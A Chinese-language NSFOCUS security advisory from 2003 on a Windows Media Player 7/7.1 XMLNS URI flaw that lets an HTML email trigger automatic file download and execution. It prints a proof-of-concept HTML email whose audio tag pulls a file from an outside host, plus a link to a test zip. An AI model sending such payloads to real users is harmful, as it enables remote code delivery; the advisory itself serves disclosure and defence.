安全研究
安全漏洞
Microsoft Windows Media Player自动文件下载和执行漏洞
发布日期:2003-05-21
更新日期:2003-05-27
受影响系统:Microsoft Windows Media Player 7.1
Microsoft Windows Media Player 7
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
不受影响系统:Microsoft Windows Media Player 9.0
描述:
BUGTRAQ ID:
7640
Windows Media Player是一款Microsoft开发和维护的媒体播放器。
Windows Media Player在处理XMLNS URI时存在问题,远程攻击者可以利用这个漏洞使Windows媒体播放器自动下载和执行文件。
攻击者可以在HTML邮件消息中嵌入精心构建XMLNS(XML Name Space)URI,结合'Microsoft Windows Media Player文件附件脚本执行漏洞'(
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=3370 ),当有此漏洞的用户浏览时,可导致下载和执行攻击者指定的文件。
<*来源:http-equiv (
http-equiv@malware.com)
链接:
http://marc.theaimsgroup.com/?l=ntbugtraq&m=105354068232112&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http-equiv (
http-equiv@malware.com)提供了如下测试方法:
MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03
http://www..malware.com
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="
http://www.malware.com/freek.asf" />
</body></html>
从如下地址下载测试程序:
http://www.malware.com/but.its.free.zip建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3361
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |